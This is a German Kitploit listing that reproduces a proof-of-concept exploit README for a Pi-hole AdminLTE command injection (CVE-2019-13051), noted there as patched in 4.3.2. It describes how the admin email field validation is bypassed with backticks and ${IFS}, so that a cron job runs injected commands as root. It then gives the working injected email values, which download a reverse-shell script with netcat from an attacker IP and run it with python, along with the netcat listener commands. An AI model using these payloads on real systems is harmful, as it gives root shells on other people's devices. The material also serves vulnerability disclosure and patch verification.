Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-13051 — Proof-of-Concept-Exploit für die Pi-Hole AdminLTE Befehlseinschleusung (CVE-2019-13051), die über E-Mail-Feld-Injection und cron-basierte Ausführung einen Fernzugriff als Root ermöglicht. | Kitploit
Tools/GitHubGitHub/pr0tean/cve-2019-13051
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubpr0tean/cve-2019-13051

CVE-2019-13051

Proof-of-Concept-Exploit für die Pi-Hole AdminLTE Befehlseinschleusung (CVE-2019-13051), die über E-Mail-Feld-Injection und cron-basierte Ausführung einen Fernzugriff als Root ermöglicht.

Repository anzeigen
203vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Pi-Hole < 4.3.2 Befehlseinschleusung & Privilegieneskalation (CVE-2019-13051)

Pi-Hole Version 4.3.2 enthält einen Patch für diese Sicherheitslücke: https://github.com/pi-hole/AdminLTE/pull/974

Ein großes Dankeschön an das Pi-Hole-Entwicklungsteam für ihr großartiges Projekt und dafür, dass sie die Meldung dieser Sicherheitslücke so einfach gemacht haben!

Zusammenfassung

Es ist möglich, auf dem RaspberryPi-Gerät (oder dem Gerät/der VM, auf dem/der die Anwendung läuft) remote Root-Zugriff zu erlangen, indem die beschriebenen Schwachstellen in der Komponente "AdminLTE" ausgenutzt werden. Für die Ausnutzung sind administrative Zugangsdaten zur AdminLTE-Weboberfläche erforderlich.

Genauer gesagt ist es möglich, die Prüfung regulärer Ausdrücke zu umgehen und das Feld "Administrator-E-Mail-Adresse" mit beliebigen Befehlen zu verunreinigen. Diese werden anschließend in "/etc/pihole/setupVars.conf" gespeichert und dann mit root-Berechtigungen aus dem 10-minütigen Cron-Job "/usr/local/bin/pihole updatechecker local" geparst und ausgeführt.

Voraussetzungen für den Angriff

  1. Netzwerkverbindung zur administrativen Pi-Hole-Webanwendung (AdminLTE).
  2. Ein Satz Anmeldedaten für die AdminLTE-Webanwendung.

Einschränkungen

Ein Angreifer muss auf das 10-minütige Intervall des Cron-Jobs "/etc/cron.d/pihole" für die Befehlsausführung warten.

Technische Beschreibung

Die folgenden Details und der Proof of Concept (PoC) hoffentlich helfen bei der Validierung und Reproduktion des Problems.

Nach der Authentifizierung an der Webanwendung gibt es einige serverseitige Validierungen, die ein Angreifer umgehen muss, um einen Befehl erfolgreich einzuschleusen.

In "savesettings.php" Zeile 499 wird eine vom Benutzer gesteuerte Variable "$adminemail" mit der internen PHP-Funktion FILTER_VALIDATE_EMAIL geprüft, deren Überprüfungen relativ schwach sind.

Es ist dann möglich, diese Validierungsprüfung zu umgehen und eine Befehlseinschleusung nachzuweisen, indem man einfach eine Menge Backticks in doppelten Anführungszeichen einschließt, z. B. durch Eingabe der folgenden Zeichenfolge als E-Mail des Administrators:

"`test>/tmp/poc_proof.txt`"@example.com

Screenshot 1

Innerhalb von 10 Minuten wird eine root-gehörige Datei mit dem Inhalt "test" in "/tmp/poc_proof.txt" mit Root-Berechtigungen erstellt.

Screenshot 2

Um weitere sinnvolle Angriffe durchzuführen, muss auch die Einschränkung von Leerzeichen umgangen werden (diese sind keine gültigen E-Mail-Zeichen und werden von der Funktion FILTER_VALIDATE_EMAIL abgefangen). Dafür wurde die interne Linux-Variable ${IFS} verwendet (die in den meisten Unix-Betriebssystemen standardmäßig Leerzeichen ist).

PoC:

*Hinweis: Dies könnte mit einem Einzeiler unter Verwendung der POSIX-Shell-Grammatik automatisiert werden, z. B. &&, || ...

  1. Stellen Sie sicher, dass Ihr Skript-Übermittlungsmechanismus auf Ihrem Angriffsrechner bereit ist. D. h. auf dem Angriffsrechner:

nc -nvlp 4444 < revshell.py

  1. Übermitteln Sie den 1. Befehl im Feld "Administrator-E-Mail-Adresse", um das Abrufen und Speichern eines Reverse-Shell-Python-Skripts in "/tmp/revshell.py" auszulösen:

"`nc${IFS}192.168.1.69${IFS}4444>/tmp/revshell.py`"@example.com

Screenshot 3

Die HTTP-Anfrage sieht bei Untersuchung mit einem HTTP-Proxy wie folgt aus:

Screenshot 4

Warten Sie 10 Minuten, bis der Cron-Job läuft und das Skript abruft, oder führen Sie zu Reproduktionszwecken manuell /usr/local/bin/pihole updatechecker local aus. Sie können auch den eingeschleusten Befehl in "/etc/pihole/setupVars.conf" überprüfen (der der Variable ADMIN_EMAIL zugewiesen ist).

  1. Stellen Sie sicher, dass Ihr Shell-Empfangsdienst bereit ist. D. h. auf dem Angriffsrechner:

nc -nvlp 4445

  1. Zuletzt können Sie Folgendes übermitteln:

“`python${IFS}/tmp/revshell.py`”@example.com

Warten Sie erneut 10 Minuten (oder führen Sie das Cron-Skript manuell zur Reproduktion aus) und Sie erhalten eine Root-Shell auf Ihrem Angriffsrechner.

Screenshot 1

Tool herunterladen